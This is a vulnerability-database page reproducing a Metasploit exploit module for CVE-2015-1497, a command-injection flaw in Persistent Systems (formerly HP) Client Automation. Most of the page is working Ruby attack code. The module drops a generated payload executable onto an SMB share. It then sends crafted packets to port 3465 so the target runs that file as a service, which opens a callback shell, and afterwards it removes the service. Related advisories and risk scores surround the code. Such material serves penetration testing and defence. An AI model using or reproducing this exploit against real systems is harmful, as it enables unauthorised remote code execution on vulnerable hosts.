Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)

🗓️ 27 Feb 2015 00:00:00Reported by Ben TurnerType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 61 Views

Persistent Systems Client Automation - Command Injection Remote Code Execution

Related
Code
ReporterTitlePublishedViews
Family
0day.today		HP Client Automation Command Injection Exploit
26 Feb 201500:00
zdt
0day.today		Persistent Systems Client Automation Command Injection RCE Exploit
28 Feb 201500:00
zdt
0day.today		HP Client - Automation Command Injection / Remote Code Execution
10 Oct 201600:00
zdt
Circl		CVE-2015-1497
24 Feb 201500:00
circl
CNVD		Persistent Systems Radia Client Automation Code Injection Vulnerability
26 Feb 201500:00
cnvd
Check Point Advisories		Persistent Systems Radia Client Automation Command Execution (CVE-2015-1497)
8 Mar 201500:00
checkpoint_advisories
Check Point Advisories		Persistent Systems Radia Client Automation Command Execution - Ver2 (CVE-2015-1497)
26 Mar 201500:00
checkpoint_advisories
CVE		CVE-2015-1497
16 Feb 201515:00
cve
Cvelist		CVE-2015-1497
16 Feb 201515:00
cvelist
Exploit DB		HP Client - Automation Command Injection (Metasploit)
24 Feb 201500:00
exploitdb
Rows per page
# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
# Date: 2014-10-01
# Exploit Author: Ben Turner
# Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/
# Version: 7.9, 8.1, 9.0, 9.1
# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
# CVE-2015-1497
# CVSS: 10

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	# Exploit mixins should be called first
	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::EXE	
	include Msf::Auxiliary::Report

	# Aliases for common classes
	SIMPLE = Rex::Proto::SMB::Client
	XCEPT  = Rex::Proto::SMB::Exceptions
	CONST  = Rex::Proto::SMB::Constants


	def initialize
		super(
			'Name'        => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
			'Description' => %Q{
				This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. 
			},
			'Author'         => [ 'Ben Turner' ],
			'License'        => BSD_LICENSE,
			'References'  =>
				[
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'WfsDelay'     => 10,
					'EXITFUNC' => 'process'
				},
			'Payload'     => { 'BadChars' => '', 'DisableNops' => true },
			'Platform'    => ['win'],
			'Targets'         =>
				[
					[ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}]
				],
			'DefaultTarget'   => 0,
			'DisclosureDate' => 'January 10 2014'
		)

		register_options([
			OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']),
			OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']),
			Opt::RPORT(3465),
		], self.class)

	end

	def exploit

		createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
		createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\""
		createservice << "\x22\x00\x00\x00"

                startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
                startservice << "Nvdkit service start test"
                startservice << "\x22\x00\x00\x00"

		removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
		removeservice << "Nvdkit service remove test"
		removeservice << "\x22\x00\x00\x00"

		def filedrop()
			begin
				origrport = self.datastore['RPORT']
				self.datastore['RPORT'] = 445
				origrhost = self.datastore['RHOST']
				self.datastore['RHOST'] = self.datastore['SMBServer']
				connect()
				smb_login()
				print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...")
				self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
				exe = generate_payload_exe
				fd = smb_open("\\installservice.exe", 'rwct')
				fd << exe
				fd.close

				self.datastore['RPORT'] = origrport
				self.datastore['RHOST'] = origrhost
			
			rescue Rex::Proto::SMB::Exceptions::Error => e
				print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")	
				abort()
			end
		end

		def filetest()
			begin
				origrport = self.datastore['RPORT']
				self.datastore['RPORT'] = 445
				origrhost = self.datastore['RHOST']
				self.datastore['RHOST'] = self.datastore['SMBServer']
				connect()
				smb_login()
				print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
				self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
				file = "\\installservice.exe"
				filetest = smb_file_exist?(file)
				if filetest
					print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n")
				else
					print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!")
						
				end

				self.datastore['RPORT'] = origrport
				self.datastore['RHOST'] = origrhost
			
			rescue Rex::Proto::SMB::Exceptions::Error => e
				print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")	
				abort()
			end
		end

		begin
			filedrop()
			filetest()
			connect()
			sock.put(createservice)
			print_status("Creating the callback payload and installing the remote service")
			disconnect
			sleep(5)
			connect()
			sock.put(startservice)
                        print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service")
			disconnect
			sleep(30)
			connect
			sock.put(removeservice)
			disconnect

		rescue ::Exception => e
			print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n")	
			abort()
		
		end
	end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Feb 2015 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 210
EPSS0.88255
pscaremote code executioncommand injectionmetasploitexploitvendorwindows xpwindows 7server 2003server 2008cve-2015-1497cvss 10smbpayloadvulnerabilityben turnerpreviosuly hppersistent systemsradiahpcaservice installcallback payloadfiledropfiletest
61